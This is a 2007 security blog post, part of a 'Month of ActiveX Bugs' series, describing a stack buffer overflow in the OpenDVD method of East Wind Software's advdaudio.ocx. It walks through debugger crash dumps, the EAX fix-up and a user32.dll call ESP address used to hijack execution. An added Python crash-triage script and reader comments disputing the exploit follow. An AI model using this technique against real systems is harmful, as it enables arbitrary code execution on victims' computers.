2007/05/05

MoAxB #05: East Wind Software (advdaudio.ocx v. 1.5.1.1) 'OpenDVD' method Stack Buffer Overflow

Well, I wanted to save the more interesting bugs for the second half of the month but, since a fuss is brewing (about the way I write English and about my technical skills), I'm posting an exploit that uses a stack overflow caused by the ocx to execute arbitrary code on a PC.

Online demonstration

txt format

Let's look at the scenario more closely. At the moment of the crash the register state is the following:

14:51:52.171 pid=0A90 tid=0E40 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [616165E5])
----------------------------------------------------------------
EAX=61616161: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=0174EDE0: 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42
ECX=000035D1: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=01750110: 6F 00 F2 00 ED F2 F2 00-ED F2 F2 00 ED F2 F2 00
ESP=0174EA40: 10 EB FF 02 1C EB 74 01-61 1E 94 7C 1C EB 74 01
EBP=0174EDB8: 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42
ESI=00000008: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=02FE056E: 20 20 20 20 3C 2F 70 3E-0D 0A 20 20 20 20 20 20
EIP=03D2187D: 8B 90 84 04 00 00 8D 88-7C 04 00 00 85 D2 7E 09
--> MOV EDX,[EAX+00000484]
----------------------------------------------------------------

14:51:52.171 pid=0A90 tid=0E40 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [42424242])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=0174E670: BF 37 91 7C 58 E7 74 01-AC ED 74 01 74 E7 74 01
EBP=0174E690: 40 E7 74 01 8B 37 91 7C-58 E7 74 01 AC ED 74 01
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
----------------------------------------------------------------

As you can see, the first fault happens when the code tries to read memory through EAX (the instruction at EIP is `MOV EDX,[EAX+00000484]` and EAX holds our 0x61616161 padding), while in the next step EIP itself has been overwritten with arbitrary data (0x42424242).
So the first thing to do is to put a readable address into EAX, in order to get past that first limitation.
We therefore pass 0x77D7AAEB, a `call ESP` (from user32.dll), and see what happens to the registers:

15:03:32.855 pid=0A98 tid=06E0 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [63636363])
----------------------------------------------------------------
EAX=73E186D4: 00 00 00 00 84 6A DF 73-00 00 00 00 2E 3F 41 56
EBX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7608F260: 10 05 46 03 FF FF FF FF-00 00 00 00 00 00 00 00
ESP=0174EDEC: 90 EB 03 59 EB 05 E8 F8-FF FF FF 4F 49 49 49 49
EBP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
----------------------------------------------------------------

15:03:32.855 pid=0A98 tid=06E0 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [63636363])
----------------------------------------------------------------
EAX=73E186D4: 00 00 00 00 84 6A DF 73-00 00 00 00 2E 3F 41 56
EBX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7608F260: 10 05 46 03 FF FF FF FF-00 00 00 00 00 00 00 00
ESP=0174EDEC: 90 EB 03 59 EB 05 E8 F8-FF FF FF 4F 49 49 49 49
EBP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
----------------------------------------------------------------

Bingo! Now we control EIP and ESP points at the shellcode; the rest is history...
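Added example, not part of the original post: a small crash-triage script that parses records in the layout of the debugger trace above and reports which values are made of fuzzer fill bytes, the check a defender runs over a crash corpus to separate a control-flow hijack (pattern in EIP) from a controlled pointer read (pattern in the faulting address) and from plain register corruption. The sample trace is constructed from the values shown in the post, with the register lines abbreviated.

```python
import re

# Constructed sample in the layout of the trace above (register lines abbreviated).
SAMPLE_TRACE = """\
14:51:52.171 pid=0A90 tid=0E40 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [616165E5])
EAX=61616161: ?? ?? ?? ??
EIP=03D2187D: 8B 90 84 04
--> MOV EDX,[EAX+00000484]
14:51:52.171 pid=0A90 tid=0E40 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [42424242])
ECX=42424242: ?? ?? ?? ??
EIP=42424242: ?? ?? ?? ??
--> N/A
"""

REC_RE = re.compile(r"^\S+ pid=[0-9A-F]+ tid=[0-9A-F]+ EXCEPTION \((.+)\)$")
EXC_RE = re.compile(r"^Exception ([0-9A-F]{8}) \(\w+ (?:reading|writing) \[([0-9A-F]{8})\]\)$")
REG_RE = re.compile(r"^(E[A-Z]{2})=([0-9A-F]{8}):")

def parse_trace(text):
    """Split a trace into records: dicts with kind, code, fault, regs, insn."""
    crashes = []
    for line in text.splitlines():
        if m := REC_RE.match(line):
            crashes.append({"kind": m.group(1), "code": "", "fault": 0, "regs": {}, "insn": ""})
        elif not crashes:
            continue                       # junk before the first record
        elif m := EXC_RE.match(line):
            crashes[-1]["code"] = m.group(1)
            crashes[-1]["fault"] = int(m.group(2), 16)
        elif m := REG_RE.match(line):
            crashes[-1]["regs"][m.group(1)] = int(m.group(2), 16)
        elif line.startswith("--> "):
            crashes[-1]["insn"] = line[4:]
    return crashes

def is_fill_pattern(value):
    """True when all four bytes of a 32-bit value are the same letter ('A', 'B', 'a'...)."""
    b = value.to_bytes(4, "little")
    return len(set(b)) == 1 and 0x41 <= b[0] <= 0x7A

def triage(crash):
    """EIP from fill bytes = hijack; faulting address from fill bytes = controlled read."""
    if is_fill_pattern(crash["regs"].get("EIP", 0)):
        return "EIP_CONTROLLED"
    if is_fill_pattern(crash["fault"]):
        return "FAULT_ADDR_CONTROLLED"
    ctrl = sorted(r for r, v in crash["regs"].items() if is_fill_pattern(v))
    return "REG_CONTROLLED:" + ",".join(ctrl) if ctrl else "UNCONTROLLED"
```

Run over the two records above it reports `REG_CONTROLLED:EAX` for the first fault and `EIP_CONTROLLED` for the second, which is exactly the escalation the post walks through.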

That's all folks!

10 comments:

Dave said...

I've been looking at your vulns and most of them don't work. Why are you publishing non-working exploits?
????????
I mean your remote exploits don't even work. Also you ripped the name from the Month of the Browser Bugs. All your DoS PoCs are the same.. Also anyone can download and run a fuzzer. Good luck. Just thought I would bring it to your attention: you need to learn to code more, test your remote PoC and see for yourself.. You haven't got a clue what you are doing and it's obvious.

shinnai said...

mmm... I suppose that, before saying that the exploit doesn't work, you searched for the correct call ESP from user32.dll (with findjmp, for example), right?
And I suppose you tried it on Windows XP Professional SP2 fully patched, right?
I think you haven't got a clue what you are saying and it's obvious.
